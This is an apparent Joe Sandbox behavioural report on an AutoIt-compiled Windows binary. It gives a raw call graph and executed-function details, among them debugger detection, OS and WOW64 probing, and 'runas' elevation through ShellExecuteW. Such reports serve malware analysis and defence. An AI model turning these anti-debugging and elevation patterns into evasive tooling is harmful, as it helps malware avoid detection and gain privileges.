103976->103941 103978 f32804 103977->103978 103979 f20dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 103978->103979 103980 f207c1 103979->103980 103980->103950 103981 f32791 103980->103981 103983 f327c0 103981->103983 103982 f20dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 103984 f327e9 103982->103984 103983->103982 103984->103953 104077 f226b0 103985->104077 103988 f20cef 103988->103955 103990 f03382 103989->103990 103991 f03327 IsThemeActive 103989->103991 104001 f20d02 GetModuleHandleW 103990->104001 104079 f252b3 103991->104079 103993 f03352 104085 f25319 103993->104085 103995 f03359 104092 f032e6 SystemParametersInfoW SystemParametersInfoW 103995->104092 103997 f03360 104093 f0338b 103997->104093 103999 f03368 SystemParametersInfoW 103999->103990 104000->103952 104001->103960 104002->103962 104003->103965 104004->103942 104005->103945 104006->103949 104007->103969 104008->103971 104013 f3d576 104009->104013 104012 f2302d 8 API calls 3 library calls 104012->103976 104014 f3d593 104013->104014 104017 f3d58f 104013->104017 104014->104017 104019 f34f6e 104014->104019 104016 f20248 104016->103974 104016->104012 104031 f20dfc 104017->104031 104020 f34f7a ___BuildCatchObject 104019->104020 104038 f332d1 EnterCriticalSection 104020->104038 104022 f34f81 104039 f35422 104022->104039 104024 f34f90 104030 f34f9f 104024->104030 104052 f34e02 29 API calls 104024->104052 104027 f34f9a 104053 f34eb8 GetStdHandle GetFileType 104027->104053 104029 f34fb0 __wsopen_s 104029->104014 104054 f34fbb LeaveCriticalSection _abort 104030->104054 104032 f20e07 IsProcessorFeaturePresent 104031->104032 104033 f20e05 104031->104033 104035 f20fce 104032->104035 104033->104016 104076 f20f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104035->104076 104037 f210b1 104037->104016 104038->104022 104040 f3542e ___BuildCatchObject 104039->104040 104041 f35452 104040->104041 104042 f3543b 104040->104042 104055 f332d1 EnterCriticalSection 104041->104055 104063 f2f649 20 API calls _abort 104042->104063 104045 f35440 104064 f32b5c 26 API calls __wsopen_s 104045->104064 104047 f3548a 104065 f354b1 LeaveCriticalSection _abort 104047->104065 104048 f3544a __wsopen_s 104048->104024 104049 f3545e 104049->104047 104056 f35373 104049->104056 104052->104027 104053->104030 104054->104029 104055->104049 104066 f34ff0 104056->104066 104058 f35385 104062 f35392 104058->104062 104073 f33778 11 API calls 2 library calls 104058->104073 104059 f32d38 _free 20 API calls 104061 f353e4 104059->104061 104061->104049 104062->104059 104063->104045 104064->104048 104065->104048 104071 f34ffd _abort 104066->104071 104067 f3503d 104075 f2f649 20 API calls _abort 104067->104075 104068 f35028 RtlAllocateHeap 104069 f3503b 104068->104069 104068->104071 104069->104058 104071->104067 104071->104068 104074 f2521d 7 API calls 2 library calls 104071->104074 104073->104058 104074->104071 104075->104069 104076->104037 104078 f20cdc GetStartupInfoW 104077->104078 104078->103988 104080 f252bf ___BuildCatchObject 104079->104080 104142 f332d1 EnterCriticalSection 104080->104142 104082 f252ca pre_c_initialization 104143 f2530a 104082->104143 104084 f252ff __wsopen_s 104084->103993 104086 f25325 104085->104086 104087 f2533f 104085->104087 104086->104087 104147 f2f649 20 API calls _abort 104086->104147 104087->103995 104089 f2532f 104148 f32b5c 26 API calls __wsopen_s 104089->104148 104091 f2533a 104091->103995 104092->103997 104094 f0339b __wsopen_s 104093->104094 104095 f0bf73 8 API calls 104094->104095 104096 f033a7 GetCurrentDirectoryW 104095->104096 104149 f04fd9 104096->104149 104098 f033ce IsDebuggerPresent 104099 f43ca3 MessageBoxA 104098->104099 104100 f033dc 104098->104100 104102 f43cbb 104099->104102 104101 f033f0 104100->104101 104100->104102 104217 f03a95 104101->104217 104253 f04176 8 API calls 104102->104253 104109 f03462 104111 f43cec SetCurrentDirectoryW 104109->104111 104112 f0346a 104109->104112 104111->104112 104113 f03475 104112->104113 104254 f61fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104112->104254 104249 f034d3 7 API calls 104113->104249 104116 f43d07 104116->104113 104119 f43d19 104116->104119 104255 f05594 104119->104255 104120 f0347f 104122 f0396b 60 API calls 104120->104122 104126 f03494 104120->104126 104122->104126 104123 f43d22 104124 f0b329 8 API calls 104123->104124 104125 f43d30 104124->104125 104128 f43d5f 104125->104128 104129 f43d38 104125->104129 104127 f034af 104126->104127 104130 f03907 Shell_NotifyIconW 104126->104130 104133 f034b6 SetCurrentDirectoryW 104127->104133 104132 f06b7c 8 API calls 104128->104132 104131 f06b7c 8 API calls 104129->104131 104130->104127 104134 f43d43 104131->104134 104135 f43d5b GetForegroundWindow ShellExecuteW 104132->104135 104136 f034ca 104133->104136 104137 f07bb5 8 API calls 104134->104137 104140 f43d90 104135->104140 104136->103999 104139 f43d51 104137->104139 104141 f06b7c 8 API calls 104139->104141 104140->104127 104141->104135 104142->104082 104146 f33319 LeaveCriticalSection 104143->104146 104145 f25311 104145->104084 104146->104145 104147->104089 104148->104091 104150 f0bf73 8 API calls 104149->104150 104151 f04fef 104150->104151 104262 f063d7 104151->104262 104153 f0500d 104154 f0bd57 8 API calls 104153->104154 104155 f05021 104154->104155 104156 f0bed9 8 API calls 104155->104156 104157 f0502c 104156->104157 104276 f0893c 104157->104276 104160 f0b329 8 API calls 104161 f05045 104160->104161 104162 f0be2d 39 API calls 104161->104162 104163 f05055 104162->104163 104164 f0b329 8 API calls 104163->104164 104165 f0507b 104164->104165 104166 f0be2d 39 API calls 104165->104166 104167 f0508a 104166->104167 104168 f0bf73 8 API calls 104167->104168 104169 f050a8 104168->104169 104279 f051ca 104169->104279 104172 f24d98 _strftime 40 API calls 104173 f050c2 104172->104173 104174 f44b23 104173->104174 104175 f050cc 104173->104175 104177 f051ca 8 API calls 104174->104177 104176 f24d98 _strftime 40 API calls 104175->104176 104178 f050d7 104176->104178 104179 f44b37 104177->104179 104178->104179 104180 f050e1 104178->104180 104181 f051ca 8 API calls 104179->104181 104182 f24d98 _strftime 40 API calls 104180->104182 104183 f44b53 104181->104183 104184 f050ec 104182->104184 104186 f05594 10 API calls 104183->104186 104184->104183 104185 f050f6 104184->104185 104187 f24d98 _strftime 40 API calls 104185->104187 104188 f44b76 104186->104188 104189 f05101 104187->104189 104190 f051ca 8 API calls 104188->104190 104191 f44b9f 104189->104191 104192 f0510b 104189->104192 104194 f44b82 104190->104194 104193 f051ca 8 API calls 104191->104193 104195 f0512e 104192->104195 104196 f0bed9 8 API calls 104192->104196 104197 f44bbd 104193->104197 104199 f0bed9 8 API calls 104194->104199 104198 f44bda 104195->104198 104202 f07e12 8 API calls 104195->104202 104200 f05121 104196->104200 104201 f0bed9 8 API calls 104197->104201 104203 f44b90 104199->104203 104204 f051ca 8 API calls 104200->104204 104205 f44bcb 104201->104205 104206 f0513e 104202->104206 104207 f051ca 8 API calls 104203->104207 104204->104195 104208 f051ca 8 API calls 104205->104208 104209 f08470 8 API calls 104206->104209 104207->104191 104208->104198 104210 f0514c 104209->104210 104285 f08a60 104210->104285 104212 f0893c 8 API calls 104214 f05167 104212->104214 104213 f08a60 8 API calls 104213->104214 104214->104212 104214->104213 104215 f051ab 104214->104215 104216 f051ca 8 API calls 104214->104216 104215->104098 104216->104214 104218 f03aa2 __wsopen_s 104217->104218 104219 f03abb 104218->104219 104220 f440da ___scrt_fastfail 104218->104220 104221 f05851 9 API calls 104219->104221 104223 f440f6 GetOpenFileNameW 104220->104223 104222 f03ac4 104221->104222 104298 f03a57 104222->104298 104225 f44145 104223->104225 104227 f08577 8 API calls 104225->104227 104229 f4415a 104227->104229 104229->104229 104230 f03ad9 104316 f062d5 104230->104316 104861 f03624 7 API calls 104249->104861 104251 f0347a 104252 f035b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104251->104252 104252->104120 104253->104109 104254->104116 104256 f422d0 __wsopen_s 104255->104256 104257 f055a1 GetModuleFileNameW 104256->104257 104258 f0b329 8 API calls 104257->104258 104259 f055c7 104258->104259 104260 f05851 9 API calls 104259->104260 104261 f055d1 104260->104261 104261->104123 104263 f063e4 __wsopen_s 104262->104263 104264 f08577 8 API calls 104263->104264 104265 f06416 104263->104265 104264->104265 104266 f0655e 8 API calls 104265->104266 104274 f0644c 104265->104274 104266->104265 104267 f0b329 8 API calls 104268 f06543 104267->104268 104270 f06a7c 8 API calls 104268->104270 104269 f0b329 8 API calls 104269->104274 104272 f0654f 104270->104272 104271 f0655e 8 API calls 104271->104274 104272->104153 104273 f06a7c 8 API calls 104273->104274 104274->104269 104274->104271 104274->104273 104275 f0651a 104274->104275 104275->104267 104275->104272 104277 f2014b 8 API calls 104276->104277 104278 f05038 104277->104278 104278->104160 104280 f051f2 104279->104280 104281 f051d4 104279->104281 104282 f08577 8 API calls 104280->104282 104283 f050b4 104281->104283 104284 f0bed9 8 API calls 104281->104284 104282->104283 104283->104172 104284->104283 104286 f08a76 104285->104286 104287 f46737 104286->104287 104293 f08a80 104286->104293 104296 f1b7a2 8 API calls 104287->104296 104288 f46744 104297 f0b4c8 8 API calls 104288->104297 104291 f46762 104291->104291 104292 f08b94 104294 f2014b 8 API calls 104292->104294 104293->104288 104293->104292 104295 f08b9b 104293->104295 104294->104295 104295->104214 104296->104288 104297->104291 104299 f422d0 __wsopen_s 104298->104299 104300 f03a64 GetLongPathNameW 104299->104300 104301 f08577 8 API calls 104300->104301 104302 f03a8c 104301->104302 104303 f053f2 104302->104303 104304 f0bf73 8 API calls 104303->104304 104305 f05404 104304->104305 104306 f05851 9 API calls 104305->104306 104307 f0540f 104306->104307 104308 f0541a 104307->104308 104313 f44d5b 104307->104313 104309 f06a7c 8 API calls 104308->104309 104311 f05426 104309->104311 104346 f01340 104311->104346 104314 f44d7d 104313->104314 104352 f1e36b 41 API calls 104313->104352 104315 f05439 104315->104230 104353 f06679 104316->104353 104347 f01352 104346->104347 104351 f01371 __fread_nolock 104346->104351 104349 f2017b 8 API calls 104347->104349 104348 f2014b 8 API calls 104350 f01388 104348->104350 104349->104351 104350->104315 104351->104348 104352->104313 104532 f0663e LoadLibraryA 104353->104532 104358 f066a4 LoadLibraryExW 104540 f06607 LoadLibraryA 104358->104540 104359 f45648 104360 f066e7 68 API calls 104359->104360 104362 f4564f 104360->104362 104364 f06607 3 API calls 104362->104364 104366 f45657 104364->104366 104561 f0684a 104366->104561 104533 f06674 104532->104533 104534 f06656 GetProcAddress 104532->104534 104537 f2e95b 104533->104537 104535 f06666 104534->104535 104535->104533 104536 f0666d FreeLibrary 104535->104536 104536->104533 104569 f2e89a 104537->104569 104539 f06698 104539->104358 104539->104359 104541 f0663b 104540->104541 104542 f0661c GetProcAddress 104540->104542 104545 f06720 104541->104545 104543 f0662c 104542->104543 104543->104541 104544 f06634 FreeLibrary 104543->104544 104544->104541 104546 f2017b 8 API calls 104545->104546 104547 f06735 104546->104547 104548 f0423c 8 API calls 104547->104548 104550 f06741 __fread_nolock 104548->104550 104549 f456c2 104627 f73a92 74 API calls 104549->104627 104550->104549 104554 f0677c 104550->104554 104626 f73a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104550->104626 104553 f0684a 40 API calls 104553->104554 104554->104553 104555 f06874 64 API calls 104554->104555 104557 f06810 messages 104554->104557 104558 f45706 104554->104558 104555->104554 104562 f45760 104561->104562 104563 f0685c 104561->104563 104659 f2ec34 104563->104659 104572 f2e8a6 ___BuildCatchObject 104569->104572 104570 f2e8b4 104594 f2f649 20 API calls _abort 104570->104594 104572->104570 104573 f2e8e4 104572->104573 104575 f2e8f6 104573->104575 104576 f2e8e9 104573->104576 104574 f2e8b9 104595 f32b5c 26 API calls __wsopen_s 104574->104595 104586 f383e1 104575->104586 104596 f2f649 20 API calls _abort 104576->104596 104580 f2e8ff 104581 f2e905 104580->104581 104583 f2e912 104580->104583 104585 f2e8c4 __wsopen_s 104585->104539 104587 f383ed ___BuildCatchObject 104586->104587 104599 f332d1 EnterCriticalSection 104587->104599 104589 f383fb 104600 f3847b 104589->104600 104593 f3842c __wsopen_s 104593->104580 104594->104574 104595->104585 104596->104585 104599->104589 104603 f3849e 104600->104603 104601 f384f7 104602 f34ff0 _abort 20 API calls 104601->104602 104605 f38500 104602->104605 104603->104601 104609 f38408 104603->104609 104616 f294fd EnterCriticalSection 104603->104616 104617 f29511 LeaveCriticalSection 104603->104617 104606 f32d38 _free 20 API calls 104605->104606 104607 f38509 104606->104607 104607->104609 104618 f33778 11 API calls 2 library calls 104607->104618 104613 f38437 104609->104613 104610 f38528 104620 f33319 LeaveCriticalSection 104613->104620 104615 f3843e 104615->104593 104616->104603 104617->104603 104618->104610 104620->104615 104626->104549 104627->104554 104662 f2ec51 104659->104662 104663 f2ec5d ___BuildCatchObject 104662->104663 104861->104251 105366 f5400f 105372 f0eeb0 messages 105366->105372 105367 f0f0d5 105368 f0f211 PeekMessageW 105368->105372 105369 f0ef07 GetInputState 105369->105368 105369->105372 105370 f532cd TranslateAcceleratorW 105370->105372 105372->105367 105372->105368 105372->105369 105372->105370 105373 f0f28f PeekMessageW 105372->105373 105374 f0f104 timeGetTime 105372->105374 105375 f0f273 TranslateMessage DispatchMessageW 105372->105375 105376 f0f2af Sleep 105372->105376 105377 f54183 Sleep 105372->105377 105378 f533e9 timeGetTime 105372->105378 105395 f10340 206 API calls 105372->105395 105396 f12b20 206 API calls 105372->105396 105398 f0f450 105372->105398 105405 f0f6d0 105372->105405 105428 f1e915 105372->105428 105434 f7446f 8 API calls 105372->105434 105435 f73fe1 81 API calls __wsopen_s 105372->105435 105373->105372 105374->105372 105375->105373 105393 f0f2c0 105376->105393 105377->105393 105433 f1aa65 9 API calls 105378->105433 105379 f1f215 timeGetTime 105379->105393 105380 f6dd87 46 API calls 105380->105393 105382 f5421a GetExitCodeProcess 105385 f54246 CloseHandle 105382->105385 105386 f54230 WaitForSingleObject 105382->105386 105383 f53d51 105388 f53d59 105383->105388 105384 f9345b GetForegroundWindow 105384->105393 105385->105393 105386->105372 105386->105385 105389 f542b8 Sleep 105389->105372 105393->105372 105393->105379 105393->105380 105393->105382 105393->105383 105393->105384 105393->105389 105436 f860b5 8 API calls 105393->105436 105437 f6f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105393->105437 105395->105372 105396->105372 105399 f0f483 105398->105399 105400 f0f46f 105398->105400 105470 f73fe1 81 API calls __wsopen_s 105399->105470 105438 f0e960 105400->105438 105403 f0f47a 105403->105372 105404 f54584 105404->105404 105406 f0f710 105405->105406 105425 f0f7dc messages 105406->105425 105487 f205b2 5 API calls __Init_thread_wait 105406->105487 105409 f545d9 105411 f0bf73 8 API calls 105409->105411 105409->105425 105410 f0bf73 8 API calls 105410->105425 105412 f545f3 105411->105412 105488 f20413 29 API calls __onexit 105412->105488 105413 f0be2d 39 API calls 105413->105425 105416 f545fd 105489 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105416->105489 105419 f10340 206 API calls 105419->105425 105421 f0bed9 8 API calls 105421->105425 105422 f11ca0 8 API calls 105422->105425 105423 f0fae1 105423->105372 105424 f73fe1 81 API calls 105424->105425 105425->105410 105425->105413 105425->105419 105425->105421 105425->105422 105425->105423 105425->105424 105486 f1b35c 206 API calls 105425->105486 105490 f205b2 5 API calls __Init_thread_wait 105425->105490 105491 f20413 29 API calls __onexit 105425->105491 105492 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105425->105492 105493 f85231 101 API calls 105425->105493 105494 f8731e 206 API calls 105425->105494 105429 f1e959 105428->105429 105431 f1e928 105428->105431 105429->105372 105430 f1e94c IsDialogMessageW 105430->105429 105430->105431 105431->105429 105431->105430 105432 f5eff6 GetClassLongW 105431->105432 105432->105430 105432->105431 105433->105372 105434->105372 105435->105372 105436->105393 105437->105393 105439 f10340 206 API calls 105438->105439 105456 f0e99d 105439->105456 105440 f531d3 105484 f73fe1 81 API calls __wsopen_s 105440->105484 105442 f0ea0b messages 105442->105403 105443 f0edd5 105443->105442 105454 f2017b 8 API calls 105443->105454 105444 f0eac3 105444->105443 105445 f0eace 105444->105445 105447 f2014b 8 API calls 105445->105447 105446 f0ecff 105448 f531c4 105446->105448 105449 f0ed14 105446->105449 105459 f0ead5 __fread_nolock 105447->105459 105483 f86162 8 API calls 105448->105483 105452 f2014b 8 API calls 105449->105452 105450 f0ebb8 105455 f2017b 8 API calls 105450->105455 105463 f0eb6a 105452->105463 105453 f2014b 8 API calls 105453->105456 105454->105459 105457 f0eb29 __fread_nolock messages 105455->105457 105456->105440 105456->105442 105456->105443 105456->105444 105456->105450 105456->105453 105456->105457 105457->105446 105462 f531b3 105457->105462 105457->105463 105466 f5318e 105457->105466 105468 f5316c 105457->105468 105479 f044fe 206 API calls 105457->105479 105458 f2014b 8 API calls 105460 f0eaf6 105458->105460 105459->105458 105459->105460 105460->105457 105471 f0d260 105460->105471 105482 f73fe1 81 API calls __wsopen_s 105462->105482 105463->105403 105481 f73fe1 81 API calls __wsopen_s 105466->105481 105480 f73fe1 81 API calls __wsopen_s 105468->105480 105470->105404 105472 f0d2c6 105471->105472 105473 f0d29a 105471->105473 105475 f10340 206 API calls 105472->105475 105474 f0f6d0 206 API calls 105473->105474 105477 f0d2a0 105473->105477 105474->105477 105476 f5184b 105475->105476 105476->105477 105485 f73fe1 81 API calls __wsopen_s 105476->105485 105477->105457 105477->105477 105479->105457 105480->105463 105481->105463 105482->105463 105483->105440 105484->105442 105485->105477 105486->105425 105487->105409 105488->105416 105489->105425 105490->105425 105491->105425 105492->105425 105493->105425 105494->105425 104862 f2f06e 104863 f2f07a ___BuildCatchObject 104862->104863 104864 f2f086 104863->104864 104865 f2f09b 104863->104865 104881 f2f649 20 API calls _abort 104864->104881 104875 f294fd EnterCriticalSection 104865->104875 104868 f2f0a7 104876 f2f0db 104868->104876 104869 f2f08b 104882 f32b5c 26 API calls __wsopen_s 104869->104882 104874 f2f096 __wsopen_s 104875->104868 104884 f2f106 104876->104884 104878 f2f0e8 104879 f2f0b4 104878->104879 104904 f2f649 20 API calls _abort 104878->104904 104883 f2f0d1 LeaveCriticalSection __fread_nolock 104879->104883 104881->104869 104882->104874 104883->104874 104885 f2f114 104884->104885 104886 f2f12e 104884->104886 104908 f2f649 20 API calls _abort 104885->104908 104887 f2dcc5 __fread_nolock 26 API calls 104886->104887 104889 f2f137 104887->104889 104905 f39789 104889->104905 104890 f2f119 104909 f32b5c 26 API calls __wsopen_s 104890->104909 104894 f2f23b 104896 f2f248 104894->104896 104897 f2f1ee 104894->104897 104895 f2f1bf 104895->104897 104899 f2f1dc 104895->104899 104911 f2f649 20 API calls _abort 104896->104911 104903 f2f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104897->104903 104912 f2f29b 30 API calls 2 library calls 104897->104912 104910 f2f41f 31 API calls 4 library calls 104899->104910 104901 f2f1e6 104901->104903 104903->104878 104904->104879 104913 f39606 104905->104913 104907 f2f153 104907->104894 104907->104895 104907->104903 104908->104890 104909->104903 104910->104901 104911->104903 104912->104903 104914 f39612 ___BuildCatchObject 104913->104914 104915 f39632 104914->104915 104916 f3961a 104914->104916 104918 f396e6 104915->104918 104923 f3966a 104915->104923 104939 f2f636 20 API calls _abort 104916->104939 104944 f2f636 20 API calls _abort 104918->104944 104919 f3961f 104940 f2f649 20 API calls _abort 104919->104940 104922 f396eb 104945 f2f649 20 API calls _abort 104922->104945 104938 f354ba EnterCriticalSection 104923->104938 104926 f39627 __wsopen_s 104926->104907 104927 f396f3 104946 f32b5c 26 API calls __wsopen_s 104927->104946 104928 f39670 104930 f39694 104928->104930 104931 f396a9 104928->104931 104941 f2f649 20 API calls _abort 104930->104941 104933 f3970b __wsopen_s 28 API calls 104931->104933 104935 f396a4 104933->104935 104934 f39699 104942 f2f636 20 API calls _abort 104934->104942 104943 f396de LeaveCriticalSection __wsopen_s 104935->104943 104938->104928 104939->104919 104940->104926 104941->104934 104942->104935 104943->104926 104944->104922 104945->104927 104946->104926 105495 f517c8 105497 f517df 105495->105497 105496 f0d2a0 105497->105496 105499 f73fe1 81 API calls __wsopen_s 105497->105499 105499->105496

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 00F05FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 234 f05fc8-f06037 call f0bf73 GetVersionExW call f08577 239 f4507d-f45090 234->239 240 f0603d 234->240 241 f45091-f45095 239->241 242 f0603f-f06041 240->242 243 f45097 241->243 244 f45098-f450a4 241->244 245 f06047-f060a6 call f0adf4 call f055dc 242->245 246 f450bc 242->246 243->244 244->241 247 f450a6-f450a8 244->247 259 f45224-f4522b 245->259 260 f060ac-f060ae 245->260 250 f450c3-f450cf 246->250 247->242 249 f450ae-f450b5 247->249 249->239 252 f450b7 249->252 253 f0611c-f06136 GetCurrentProcess IsWow64Process 250->253 252->246 255 f06195-f0619b 253->255 256 f06138 253->256 258 f0613e-f0614a 255->258 256->258 265 f06150-f0615f LoadLibraryA 258->265 266 f45269-f4526d GetSystemInfo 258->266 263 f4522d 259->263 264 f4524b-f4524e 259->264 261 f45125-f45138 260->261 262 f060b4-f060b7 260->262 267 f45161-f45163 261->267 268 f4513a-f45143 261->268 262->253 269 f060b9-f060f5 262->269 270 f45233 263->270 271 f45250-f4525f 264->271 272 f45239-f45241 264->272 273 f06161-f0616f GetProcAddress 265->273 274 f0619d-f061a7 GetSystemInfo 265->274 279 f45165-f4517a 267->279 280 f45198-f4519b 267->280 276 f45145-f4514b 268->276 277 f45150-f4515c 268->277 269->253 278 f060f7-f060fa 269->278 270->272 271->270 281 f45261-f45267 271->281 272->264 273->274 282 f06171-f06175 GetNativeSystemInfo 273->282 275 f06177-f06179 274->275 289 f06182-f06194 275->289 290 f0617b-f0617c FreeLibrary 275->290 276->253 277->253 283 f450d4-f450e4 278->283 284 f06100-f0610a 278->284 285 f45187-f45193 279->285 286 f4517c-f45182 279->286 287 f451d6-f451d9 280->287 288 f4519d-f451b8 280->288 281->272 282->275 294 f450e6-f450f2 283->294 295 f450f7-f45101 283->295 284->250 291 f06110-f06116 284->291 285->253 286->253 287->253 296 f451df-f45206 287->296 292 f451c5-f451d1 288->292 293 f451ba-f451c0 288->293 290->289 291->253 292->253 293->253 294->253 297 f45114-f45120 295->297 298 f45103-f4510f 295->298 299 f45213-f4521f 296->299 300 f45208-f4520e 296->300 297->253 298->253 299->253 300->253
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00F05FF7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00F9DC2C,00000000,?,?), ref: 00F06123
                                                                                                                                                                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F0612A
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F06155
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F06167
                                                                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F06175
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F0617C
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00F061A1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c27e0266e1f16b10a6e5217b54aa5117cd881864a1dbe44c65e6da116ac3816
                                                                                                                                                                                                                                                                                        • Instruction ID: add275f51f49a30c7ad1afd99c2ab2a94af65bd95fc3a7e550962c57f78f4d31
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c27e0266e1f16b10a6e5217b54aa5117cd881864a1dbe44c65e6da116ac3816
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BA1913290B2CCCFC796DBBCBC412993FA66B76704B18489BD48197262C66D4548FBF1
                                                                                                                                                                                                                                                                                        Function 00F0338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F03368,?), ref: 00F033BB
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F03368,?), ref: 00F033CE
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD2418,00FD2400,?,?,?,?,?,?,00F03368,?), ref: 00F0343A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03462,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F042A0
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F034BB
                                                                                                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00F43CB0
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F43CF1
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FC31F4,00FD2418,?,?,?,?,?,?,?,00F03368), ref: 00F43D7A
                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F43D81
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: GetSysColorBrush.USER32(0000000F), ref: 00F034DE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadCursorW.USER32(00000000,00007F00), ref: 00F034ED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(00000063), ref: 00F03503
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(000000A4), ref: 00F03515
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(000000A2), ref: 00F03527
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F0353F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: RegisterClassExW.USER32(?), ref: 00F03590
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F035E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03602
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F03616
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F0361F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03A3C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00F43CAA
                                                                                                                                                                                                                                                                                        • AutoIt, xrefs: 00F43CA5
                                                                                                                                                                                                                                                                                        • runas, xrefs: 00F43D75
                                                                                                                                                                                                                                                                                        Memory Dump Source
